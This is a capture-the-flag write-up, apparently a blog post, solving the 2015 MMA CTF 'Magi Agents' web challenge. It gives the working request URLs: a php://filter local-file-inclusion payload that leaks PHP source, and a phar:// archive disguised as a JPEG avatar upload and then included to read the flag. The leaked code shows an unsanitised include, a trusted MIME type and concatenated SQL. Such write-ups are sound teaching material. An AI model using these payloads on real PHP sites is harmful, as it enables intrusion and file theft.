This problem is LFI vulnerable.
Problem Page [ http://magiagents.chal.mmactf.link/ ]
'indxe.php?page=settings' is vulnerable point.
file upload is settings page.
First I got a php source.
http://magiagents.chal.mmactf.link/index.php?page=php://filter/convert.base64-encode/resource=home
// home.php<div class="page-header"><h1>Home</h1></div> <img src="magi.jpg"> <?php if (isset($_SESSION["admin"]) && $_SESSION["admin"]) { echo file_get_contents("../flag"); }
// index.php
<?php
session_start();
if (!isset($_GET["page"]) || isset($page))
$page = "home";
else
$page = $_GET["page"];
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<meta name="description" content="">
<meta name="author" content="">
<link rel="icon" href="favicon.ico">
<title>Mortal Magi Agents</title>
<!-- Bootstrap core CSS -->
<link href="css/bootstrap.min.css" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="css/jumbotron.css" rel="stylesheet">
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="index.php">Mortal Magi Agents</a>
</div>
<div id="navbar" class="collapse navbar-collapse">
<ul class="nav navbar-nav">
<li class="active"><a href="?page=home">Home</a></li>
<li><a href="?page=news">News</a></li>
<li><a href="#contact">Contact</a></li>
</ul>
<?php if (isset($_SESSION["user"])) { ?>
<ul class="nav navbar-nav navbar-right">
<li class='dropdown'>
<a href="#" aria-expanded="false" class="dropdown-toggle" data-toggle="dropdown" role="button">
<?php
if (isset($_SESSION["avator"])) {
echo '<img src="'.$_SESSION['avator'].'" width="32" height="32">';
}
echo $_SESSION["user"];
?><span class='caret'></span></a>
<ul class='dropdown-menu' role='menu'>
<li><a href="?page=settings">Settings</a></li>
<li><a href="logout.php">Sign out</a></li>
</ul>
</li>
</ul>
<?php } else { ?>
<form class="navbar-form navbar-right" action="login.php" method="post">
<div class="form-group">
<input type="text" placeholder="User" class="form-control" name="user">
</div>
<div class="form-group">
<input type="password" placeholder="Password" class="form-control" name="password">
</div>
<button type="submit" class="btn btn-success" name="signin">Sign in</button>
<button type="submit" class="btn btn-danger" name="signup">Sign up</button>
</form>
<?php } ?>
</div><!--/.nav-collapse -->
</div>
</nav>
<!-- Main jumbotron for a primary marketing message or call to action -->
<!--
<div class="jumbotron">
</div>
-->
<div class="container">
<?php
include("$page.php");
?>
</div>
<hr>
<footer>
<p>Mortal Magi Agents 2015</p>
</footer>
</div> <!-- /container -->
<!-- Bootstrap core JavaScript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script src="js/bootstrap.min.js"></script>
</body>
</html>
// settings.php
<?php
require "./db.php";
if (isset($_FILES["file"])) {
if ($_FILES['file']['type'] == "image/jpeg") {
$ext = ".jpg";
}
else if ($_FILES['file']['type'] == "image/gif") {
$ext = ".gif";
}
else if ($_FILES['file']['type'] == "image/png") {
$ext = ".png";
}
$filename = "avators/" . $_SESSION["user"] . sha1_file($_FILES['file']['tmp_name']) . $ext;
move_uploaded_file($_FILES['file']['tmp_name'], $filename);
$_SESSION["avator"] = $filename;
$db = connect_db();
$db->query("UPDATE users SET avator = '$filename' WHERE name = '".$_SESSION['user']."'");
}
?>
<div class="page-header"><h1>Settings</h1></div>
<h2>Avator</h2>
<?php
if (isset($_SESSION["avator"])) {
?>
<img src="<?php echo $_SESSION['avator']; ?>" width="64" height="64">
<?php
}
?>
<h3>New avator</h3>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit">
</form>
upload file name is 'user'+sha1(filename)
but, this name is no problem.
i used phar://
getflag.php
<?php echo file_get_contents('../flag');?>
http://magiagents.chal.mmactf.link/?page=phar:///var/www/html/avators/afafafb347d0cf8bd02e7ddd7c018e74fa336beff2b0b5.jpg/getflag
MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}
Good
Flag is MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}
'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글
| [Crypto] Twin Prime - 50pts (0) | 2016.09.05 |
|---|---|
| [Web] Global Page - 50pts (0) | 2016.09.05 |
| [Web] Get the admin password! - 100pts (0) | 2016.09.05 |
| [Web] Login as admin! - 30pts (0) | 2015.09.08 |